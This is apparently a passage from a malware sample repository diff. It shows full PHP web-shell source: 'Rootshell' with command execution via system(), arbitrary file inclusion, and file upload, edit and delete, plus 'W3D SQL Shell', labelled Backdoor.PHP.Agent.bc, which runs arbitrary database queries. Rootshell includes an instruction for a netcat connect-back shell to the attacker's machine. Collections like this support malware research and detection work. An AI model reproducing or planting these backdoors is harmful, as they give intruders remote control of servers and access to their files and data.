/* ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
/* .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
/* ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
/* .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
/* ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
/* ..^..^.....^..^..?WN0`` ` +llz:` .dHR:..^.......^..^... */
/* ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
/* ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
/* ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
/* ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
/* ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
/* .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
/* ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
/* ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
/* OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
/* .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
/* ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
/* ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
/* dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
/* ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
/* .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
/* ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
/* ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
/* ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
/* .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
/* ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
/* ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
/* .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
/* ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
/* ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
/* ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
/* ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
/* ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
/* .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
/* ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
/* .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/*
/* We should take care some kind of history, i will add here to keep a trace of changes (who made it).
/* Also I think we should increase the last version number by 1 if you make some changes.
/*
/* CHANGES / VERSION HISTORY:
/* ====================================================================================
/* Version Nick Description
/* - - - - - - - - - - - - - - - - - - - - - - - - - - -
/* 0.3.1 666 added an ascii bug :)
/* 0.3.1 666 password protection
/* 0.3.1 666 GET and POST changes
/* 0.3.2 666 coded a new uploader
/* 0.3.2 666 new password protection
/* 0.3.3 666 added a lot of comments :)
/* 0.3.3 666 added "Server Info"
/* 1.0.0 666 added "File Inclusion"
/* 1.0.0 666 removed password protection (nobody needs it...)
/* 1.0.0 666 added "Files & Directories"
/* 1.3.3 666 added "File Editor"
/* 2.0.0 666 added "Notices"
/* 2.0.0 666 added some new modules
/* 2.0.0 666 made some design updates
/*
/*
-->
<?
//
// Default Changes
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
$owner = "shells.dl.am"; // Insert your nick
$version = "2.0.0"; // The version
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
//
?>
<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
<style type="text/css">
body{
cursor:crosshair
}
</style>
<div align="center" style="width: 100%; height: 100">
<pre width="100%" align="center"><strong> ____ _ ____ _ _ _
| _ \ ___ ___ | |_ / ___|| |__ ___| | |
| |_) / _ \ / _ \| __| \___ \| '_ \ / _ \ | |
| _ < (_) | (_) | |_ _ ___) | | | | __/ | |
|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
</div></strong>
<b><u><center><font face='Verdana' style='font-size: 8pt'><?php echo "This server has been infected by $owner"; ?></font></center></u></b>
<hr color="#000000" size="2,5">
<div align="center">
<center>
<p>
<?php
// Check for safe mode
if( ini_get('safe_mode') ) {
print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>';
} else {
print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>';
}
?>
&nbsp;</p><font face="Webdings" size="6">!</font><br>
&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
<tr>
<td width="1%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center">
<font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
<br />
<b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
<br>
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
<b>Server Name:</b> <? echo $SERVER_NAME ?><br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
</font></tr>
</table><br />
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
<tr>
<td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
<p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
<td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
<p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center"><form method="post">
<p align="center">
<br>
<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
<br>
<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
<br><input type="submit" value="Execute!"><br>
&nbsp;<br></p>
</form>
<p align="center">
<textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
<br>
<font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect
back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
</i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
<form enctype="multipart/form-data" method="post">
<p align="center"><br>
<br>
<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
<br>
<input type="file" name="file" size="20"><br>
<br>
<font style="font-size: 5pt">&nbsp;</font><br>
<input type="submit" value="Upload File!"> <br>
&nbsp;</p>
</form>
<?php
function check_file()
{
global $file_name, $filename;
$backupstring = "copy_of_";
$filename = $backupstring."$filename";
if( file_exists($filename))
{
check_file();
}
}
if(!empty($file))
{
$filename = $file_name;
if( file_exists($file_name))
{
check_file();
echo "<p align=center>File already exist</p>";
}
else
{
copy($file,"$filename");
if( file_exists($filename))
{
echo "<p align=center>File uploaded successful</p>";
}
elseif(! file_exists($filename))
{
echo "<p align=center>File not found</p>";
}
}
}
?>
<font face="Verdana" style="font-size: 8pt">
<p align=\"center\"></font>
</td>
</tr>
<tr>
<td style="overflow:auto" width="49%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
<td width="51%" height="19" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
</tr>
<tr>
<td style="overflow:auto" width="49%" height="231">
<font face="Verdana" style="font-size: 11pt">
<p align="center">
<br>
<div align="center" style="overflow:auto; width:99%; height:175">
<?
$folder=opendir('./');
while ($file = readdir($folder)) {
if($file != "." && $file != "..")
echo '<a target="blank" href='.$file.'>'.$file.'</a><br>';
}
closedir($folder);
?>
</div><p align="center">&nbsp;</td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
Include
something :)<br>
<br>
&nbsp;</font><form method="POST">
<p align="center">
<input type="text" name="incl" size="20"><br>
<br>
<input type="submit" value="Include!" name="inc"></p>
</form>
<?php @$output = include($_POST['incl']); ?>
</td>
</tr>
<tr>
<td width="49%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td>
<td width="51%" height="19" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Notices ]</font></td>
</tr>
<tr>
<td width="49%" height="231">
<font face="Verdana" style="font-size: 11pt">
<p align="center"><?
$scriptname = $_SERVER['SCRIPT_NAME'];
$filename = $_POST["filename"];
if($_POST["submit"] == "Open")
{
if(file_exists($filename))
{
$filecontents = htmlentities(file_get_contents($filename));
if(!$filecontents)
$status = "<font face='Verdana' style='font-size: 8pt'>Error or No contents in file</font>";
}
else
$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
}
else if($_POST["submit"] == "Delete")
{
if(file_exists($filename))
{
if(unlink($filename))
$status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
else
$status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
}
else
$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
}
else if($_POST["submit"] == "Save")
{
$filecontents = stripslashes(html_entity_decode($_POST["contents"]));
if(file_exists($filename))
unlink($filename);
$handle = fopen($filename, "w");
if(!$handle)
$status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
else
{
if(!fwrite($handle, $filecontents))
$status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>";
fclose($handle);
}
$filecontents = htmlentities($filecontents);
}
else
{
$status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
}
?>
<table border="0" align="center">
<tr>
<td>
<table width="100%" border="0">
<tr>
<td>
<form method="post" action="<?echo $scriptname;?>">
<input name="filename" type="text" value="<?echo $filename;?>" size="20">
<input type="submit" name="submit" value="Open">
<input type="submit" name="submit" value="Delete">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<font face="Verdana" style="font-size: 11pt">
<textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br>
<input type="submit" name="submit" value="Save">
<input type="reset" value="Reset">
</form>
</td>
</tr>
<tr>
<td>
<h2><?echo $status;?></h2>
</td>
</tr>
</table> </td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
<textarea rows="13" cols="55"></textarea><br>
&nbsp;</font><?php @$output = include($_POST['incl']); ?></td>
</tr>
</table>
</center>
</div>
<br /></p>
<div align="center">
<center>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
<tr>
<td width="100%" bgcolor="#FCFEBA" height="20">
<p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?> © 2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.org">SR-Crew</a> </font></td>
</tr>
</table>
</center>
</div>

128
PHP/Backdoor.PHP.Agent.bc Normal file
View File

@ -0,0 +1,128 @@
<?php
/*
W3D Shell
By: Warpboy
www.private-node.net
Version: 0x01
Info: Created specifically for straight-foreward SQL interaction.
Planned updates: More features, easier interaction with database(s)
*/
//Store User Input
$user = $_POST['user'];
$pass = $_POST['pass'];
$dbn = $_POST['db'];
$host = "localhost";
//Comprehend Change
if($_REQUEST['change']) {
setcookie("user", "$user", time()+3600);
setcookie("pass", "$pass", time()+3600);
setcookie("db", "$dbn", time()+3600);
}
//Define cookies in vars
$username = $_COOKIE["user"];
$password = $_COOKIE["pass"];
$database = $_COOKIE["db"];
//build header
echo '<title>W3D Shell // By: Warpboy \\\ SQL Shell</title>';
echo '
<font color=#00CC00><body bgcolor=black>
<center><table border=0 cellpadding=0 cellspacing=0 width=50% style=font-size: 14px; font-family: Arial;>
<tr><td bgcolor=#00CC00><center><font size="3" face="Verdana"><b>W3D SQL Shell</font></tr></td>
<tr><td><font color=#FFFFFF><center><b><font size="1" face="Georgia"><marquee speed=1>By: Warpboy</td></font></tr>
';
echo '
<tr><td><font color=#00CC00><center><b><br>[]Database Info[]</td></tr><tr><td><font color=#FFFFFF><b><pre><br>
<center>
<form action="w3d.php" method="post">
Username: <input type="text" name="user" </input>
Password: <input type="text" name="pass" />
Database: <input type="text" name="db" />
<input type="submit" value="Change" name="change" />
</form> </tr></td><table>
';
echo '
<form action="w3d.php" method="get">
<b><font color=#00CC00><br>Query:</font></b> <input type="text" name="query" size="65"/>
<input type="submit" />
</form>';
//Initial pre-cookie
$con = @mysql_connect($host, $user, $pass);
if (!$con){
//secondary post-cookie
$con1 = @mysql_connect($host, $username, $password);
if(!$con1) {
echo "<br><b><font color=#00CC00>Currently not connected.<br>";
}
}
//Notify user of current connection
if($_REQUEST['change'] && $user != '') {
echo "<br><b><font color=#00CC00>Connected to MySQL as user</font>" . "<font color=red> $user</b></font>";
}
if(!$_REQUEST['change'] && $username != '') {
echo "<br><b><font color=#00CC00>Connected to MySQL as user</font>" . "<font color=red> $username</b></font>";
}
//Database Time
//initial pre-cookie
$db_c = @mysql_select_db($dbn,$con);
if(!$db_c) {
//secondary post-cookie
$db_d = @mysql_select_db($database,$con1);
if(!$db_d) {
if(isset($database) || isset($dbn)) {
echo "<br><font color=#00CC00><b>Unable to access database!";
}
}
}
//query function
query();
function query() {
$query = $_GET['query'];
if($query == '') {
echo "<br><font color=#00CC00><b>No Query Executed</b></font>";
}
else {
//Query Time
$query1 = str_replace("\\", " ", $query);
$result = @mysql_query("$query1");
echo "<br><b><font color=#00CC00>Query Results: <br /></b></font> ";
echo "<table border=1 cellpadding=0 cellspacing=0 width=100% style=\"font-size: 14px; font-family: Trebuchet;\">
<tr bgcolor=white align=center style=\"font-weight: bold;\">\n";
$rr = @mysql_num_fields($result);
for($kz=0; $kz<$rr; $kz++)
{
$ee = @mysql_field_name($result,$kz);
echo "<td bgcolor=#FFFFFF>$ee</td>";
}
echo "</tr>\n";
$vv = true;
while ($line = @mysql_fetch_array($result, MYSQL_ASSOC)) {
if($vv === true){
echo "<tr align=center bgcolor=#00CC00>\n";
$vv = false;
}
else{
echo "<tr align=center bgcolor=#00CC00>\n";
$vv = true;
}
foreach ($line as $col_value) {
echo "<td>$col_value</td>\n";
}
echo "</tr>\n";
}
echo "</table>\n";
@mysql_free_result($result);
}
}
?>

2831
PHP/Backdoor.PHP.Agent.bd Normal file
View File

File diff suppressed because it is too large Load Diff